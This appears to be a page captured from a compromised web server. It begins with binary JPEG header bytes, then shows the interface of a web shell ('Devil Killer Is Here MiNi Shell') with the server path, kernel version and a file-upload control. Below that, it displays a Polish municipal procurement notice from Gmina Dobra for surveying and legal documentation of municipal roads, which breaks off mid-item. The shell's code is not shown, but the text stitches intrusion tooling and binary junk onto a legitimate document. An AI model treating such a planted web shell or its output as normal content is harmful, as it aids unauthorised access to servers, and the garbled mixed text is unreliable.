JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220324/0009777601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> WYKONANIE DOKUMENTACJI GEODEZYJNO-PRAWNEJ W CELU REGULACJI STANU PRAWNEGO NIERUCHOMOŚCI ZAJĘTYCH POD DROGI GMINNE POŁOŻONYCH NA TERENIE GMINY DOBRA </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Dobra</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Urząd Gminy Dobra</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491892185</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dobra 233</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dobra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-642</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminadobra.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminadobra.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WYKONANIE DOKUMENTACJI GEODEZYJNO-PRAWNEJ W CELU REGULACJI STANU PRAWNEGO NIERUCHOMOŚCI ZAJĘTYCH POD DROGI GMINNE POŁOŻONYCH NA TERENIE GMINY DOBRA </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-037dd504-ab64-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00097776</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00052677/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Regulacja stanu prawnego dróg gminnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/ugdobra,m,404383,2022.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://moj.gov.pl/nforms/ezamowienia oraz udostępnionego przez miniPortal https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oferta wraz z załącznikami musi zostać sporządzona w języku polskim, złożona w postaci elektronicznej oraz podpisana kwalifikowanym podpisem elektronicznym, podpisem osobistym lub podpisem zaufanym pod rygorem nieważności.<br/>Zamawiający informuje, że podpisanie oferty i innych dokumentów nie następuje na platformie do komunikacji. Ofertę wraz załącznikami należy podpisać podpisem elektronicznym wcześniej przed jej zaszyfrowaniem na platformie.<br/>Wykonawca, aby wziąć udział w elektronicznym postępowaniu o udzielenie zamówienia publicznego musi założyć konto na ePUAP.Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków, pytań, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP https://moj.gov.pl/nforms/ezamowienia oraz udostępnionego przez miniPortal https://miniportal.uzp.gov.plWe wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania).Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: sekretariat@gminadobra.pl. Więcej informacji w Specyfikacji Warunków Zamówienia dostępnej na stronie postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje o ochronie danych osobowych zamawiający zamieścił w Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje o ochronie danych osobowych zamawiający zamieścił w Specyfikacji Warunków Zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UG.ZZ.271.10.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 - Wykonanie dokumentacji dla dróg „Sarysze-Jony” i „Krawce-Lachy” w miejscowości Chyszówki, gmina Dobra<br/><br/>Składające się następujących zadań.<br/>Wykonanie dokumentacji geodezyjno-prawnej w celu regulacji stanu prawnego nieruchomości zajętych pod drogę gminną „Sarysze-Jony” i „Krawce-Lachy” w miejscowości Chyszówki, gmina Dobra w oparciu o przepisy art.73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.),a w razie zaistnienia takiej potrzeby w oparciu o przepisy ustawy z dnia 10 maja 1990 r. Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę o pracownikach samorządowych (Dz. U. 1990 r. nr 32 poz.191 z późn. zm.).<br/><br/>Zakres przedmiotu zamówienia obejmuje m.in: <br/>a)	Pomiar pasa drogowego: ustalenie/wyznaczenie granic na podstawie przepisów Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 27 lipca 2021 r. <br/>w sprawie ewidencji gruntów i budynków działki ewid. nr 1005, 1010, 2958 <br/>(w całości), część działki 1451/1, 1019 i 2749. Zakres praz geodezyjnych przedstawiony jest na załączniku nr 1, 2, 3, 4. W przypadku zajęcia części nieruchomości sąsiadujących z drogą, pod drogę publiczną na dzień 31 grudnia 1998 r. należy sporządzić projekty podziału nieruchomości na podstawie przepisów art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.). <br/>W szczególności wydzielenie części działek nr 1012, 1297, 1298, 1299 zajętych pod drogę.<br/><br/>b)	Wykonanie mapy do celów prawnych wraz z wykazem synchronizacyjnym dla działek ewidencyjnych nr 1005, 1010, 2958 (w całości), część działek 1451/1,1019, 2749 położonych w miejscowości Chyszówki. W razie potrzeby wykonanie aktualizacji operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek oraz sporządzenie mapy do celów prawnych o nazwie: „Aktualizacja operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek ewidencyjnych”. Wykazy synchronizacyjne powinny być sporządzone tak, aby po wydaniu decyzji „komunalizacyjnej” służyły do założenia księgi wieczystej na działki na jakie decyzja została wydana.<br/>c)	Wykonanie mapy do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r.<br/>d)	Dokumentacja stanowiąca przedmiot umowy będzie sporządzona przez Wykonawcę <br/>i przekazana Zamawiającemu w ilości:<br/>- mapa do celów prawnych - aktualizacja operatu EGiB wraz wykazami synchronizacyjnymi –w ilości egz. równej ilości wydzielonych ciał hipotecznych+3 dodatkowe egz.<br/>- mapa zbiorcza z projektem podziału nieruchomości dla wszystkich dzielonych nieruchomości zajętych pod pas drogowy na dzień 31 grudnia 1998 r. – w ilości dzielonych działek +3 dodatkowe egz.<br/>- mapa do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r. <br/>- 4 egz.<br/>- operat pomiarowy w postaci elektronicznej.<br/><br/>e)	Dokumentacja geodezyjna (mapy do celów prawnych, mapy z projektem podziału nieruchomości) służąca do regulacji stanu prawnego dróg na podst. art. 73 ustawy <br/>z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną, musi zawierać adnotację, iż „stan uwidoczniony na mapie odzwierciedla stan faktycznego zajęcia nieruchomości pod drogę publiczną na dzień 31 grudnia 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną.” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71300000-1 - Usługi inżynieryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71350000-6 - Usługi inżynieryjne naukowe i techniczne</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <p class="mb-0">71354300-7 - Usługi badań katastralnych</p> <p class="mb-0">71355000-1 - Usługi pomiarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">240 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane metodą punktową w skali 100-punktowej. Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny. Cena będzie oceniana metodą punktową wg wzoru: (Cena najniższa ze wszystkich ofert x 100pkt x Znaczenie kryterium 60%)/ Cena oferty badanej.<br/>DOŚWIADCZENIE OSÓB WYZNACZONYCH DO REALIZACJI ZAMÓWIENIA – 40%. Zamawiający, oceniając doświadczenie osób wyznaczonych do realizacji zamówienia, weźmie pod uwagę doświadczenie geodety uzyskane poprzez jego udział w realizacji prac geodezyjnych opisanych poniżej: Geodeta uprawniony – doświadczenie w wykonywaniu prac geodezyjnych zrealizowanymi w okresie ostatnich 3 lat przed upływem terminu składania ofert polegającymi na sporządzeniu dokumentacji geodezyjno-prawnej do regulacji stanu prawnego drogi publicznej w rozumieniu ustawy o drogach publicznych w trybie art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną - jako geodeta uprawniony. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 1 prac, spełniającej warunki, o których mowa powyżej 10 pkt. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 2 prac, spełniającej warunki, o których mowa powyżej 20 pkt. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 3 prac, spełniającej warunki, o których mowa powyżej 30 pkt. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 4 prac, spełniającej warunki, o których mowa powyżej 40 pkt. Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium doświadczenie osób wyznaczonych do realizacji zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 - Wykonanie dokumentacji dla drogi Gąsiory w miejscowości Chyszówki, gmina Dobra i Bulaki w miejscowości Półrzeczki, gmina Dobra<br/><br/>Składające się następujących zadań.<br/><br/>1.	Wykonanie dokumentacji geodezyjno-prawnej w celu regulacji stanu prawnego nieruchomości zajętych pod drogę gminną „Gąsiory” w miejscowości Chyszówki, gmina Dobra w oparciu o przepisy art.73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.),a w razie zaistnienia takiej potrzeby w oparciu o przepisy ustawy z dnia 10 maja 1990 r. Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę o pracownikach samorządowych (Dz. U. 1990 r. nr 32 poz.191 z późn. zm.).<br/><br/>Zakres przedmiotu zamówienia obejmuje m.in: <br/>a)	Pomiar pasa drogowego: ustalenie/wyznaczenie granic na podstawie przepisów Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 27 lipca 2021 r. <br/>w sprawie ewidencji gruntów i budynków działki ewid. nr 715, 2026, 722 (w całości), część działki 732, 2281. Zakres praz geodezyjnych przedstawiony jest na załączniku nr 5. W przypadku zajęcia części nieruchomości sąsiadujących z drogą, pod drogę publiczną na dzień 31 grudnia 1998 r. należy sporządzić projekty podziału nieruchomości na podstawie przepisów art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.). <br/>b)	Wykonanie mapy do celów prawnych wraz z wykazem synchronizacyjnym dla działek ewidencyjnych nr 715, 2026, 722 (w całości), część działek 732, 2281 położonych <br/>w miejscowości Chyszówki. W razie potrzeby wykonanie aktualizacji operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek oraz sporządzenie mapy do celów prawnych o nazwie: „Aktualizacja operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek ewidencyjnych”. Wykazy synchronizacyjne powinny być sporządzone tak, aby po wydaniu decyzji „komunalizacyjnej” służyły do założenia księgi wieczystej na działki na jakie decyzja została wydana.<br/>c)	Wykonanie mapy do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r.<br/>d)	Dokumentacja stanowiąca przedmiot umowy będzie sporządzona przez Wykonawcę <br/>i przekazana Zamawiającemu w ilości:<br/>-mapy do celów prawnych-aktualizacja operatu EGiB wraz wykazami synchronizacyjnymi –w ilości egz. równej ilości wydzielonych ciał hipotecznych+3 dodatkowe egz.<br/>-mapa zbiorcza z projektem podziału nieruchomości dla wszystkich dzielonych nieruchomości zajętych pod pas drogowy na dzień 31 grudnia 1998 r. – w ilości dzielonych działek +3 dodatkowe egz.<br/>- mapy do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r. <br/>–4 egz.<br/> - operat pomiarowy w postaci elektronicznej.<br/><br/>e)	Dokumentacja geodezyjna (mapy do celów prawnych, mapy z projektem podziału nieruchomości) służąca do regulacji stanu prawnego dróg na podst. art. 73 ustawy <br/>z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną, musi zawierać adnotację, iż „stan uwidoczniony na mapie odzwierciedla stan faktycznego zajęcia nieruchomości pod drogę publiczną na dzień 31 grudnia 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną.”<br/><br/><br/>2.	Wykonanie dokumentacji geodezyjno-prawnej w celu regulacji stanu prawnego nieruchomości zajętych pod drogę gminną „Bulaki” w miejscowości Półrzeczki, gmina Dobra w oparciu o przepisy art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.),a w razie zaistnienia takiej potrzeby w oparciu o przepisy ustawy z dnia 10 maja 1990 r. Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę o pracownikach samorządowych (Dz. U. 1990 r. nr 32 poz.191 z późn. zm.).<br/> Na w/w dokumentację składać się będzie:<br/>a)	Pomiar pasa drogowego: ustalenie/wyznaczenie granic na podstawie przepisów Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 27 lipca 2021 r. <br/>w sprawie ewidencji gruntów i budynków działki ewid. nr 1981, 1980/1, 1979/1, 2018, 2109 (w całości), część działki 2144. Zakres prac geodezyjnych przedstawiony jest na załączniku nr 6. W przypadku zajęcia części nieruchomości sąsiadujących z drogą, pod drogę publiczną na dzień 31 grudnia 1998 r. należy sporządzić projekty podziału nieruchomości na podstawie przepisów art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.). <br/><br/>b)	Wykonanie mapy do celów prawnych wraz z wykazem synchronizacyjnym dla działek ewidencyjnych nr 1981, 2018, 2109 (w całości), część działki 2144. położonych w miejscowości Półrzeczki. W razie potrzeby wykonanie aktualizacji operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek oraz sporządzenie mapy do celów prawnych <br/>o nazwie: „Aktualizacja operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek ewidencyjnych”. Wykazy synchronizacyjne powinny być sporządzone tak, aby po wydaniu decyzji „komunalizacyjnej” służyły do założenia księgi wieczystej na działki na jakie decyzja została wydana.<br/>c)	Wykonanie mapy do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r.<br/><br/>d)	Dokumentacja stanowiąca przedmiot umowy będzie sporządzona przez Wykonawcę <br/>i przekazana Zamawiającemu w ilości:<br/> - mapa do celów prawnych-aktualizacja operatu EGiB wraz wykazami synchronizacyjnymi –w ilości egz. równej ilości wydzielonych ciał hipotecznych+3 dodatkowe egz.<br/> - mapa zbiorcza z projektem podziału nieruchomości dla wszystkich dzielonych nieruchomości zajętych pod pas drogowy na dzień 31 grudnia 1998 r. – w ilości dzielonych działek +3 dodatkowe egz.<br/> - mapa do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r. <br/> – 4 egz.<br/> - operat pomiarowy w postaci elektronicznej.<br/><br/>e)	Dokumentacja geodezyjna (mapy do celów prawnych, mapy z projektem podziału nieruchomości) służąca do regulacji stanu prawnego dróg na podst. art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną, musi zawierać adnotację, iż „stan uwidoczniony na mapie odzwierciedla stan faktycznego zajęcia nieruchomości pod drogę publiczną na dzień 31 grudnia 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną.” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71300000-1 - Usługi inżynieryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71350000-6 - Usługi inżynieryjne naukowe i techniczne</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <p class="mb-0">71354300-7 - Usługi badań katastralnych</p> <p class="mb-0">71355000-1 - Usługi pomiarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">240 dni</span></h3> <h3 class="mb-0">4.2.11.) 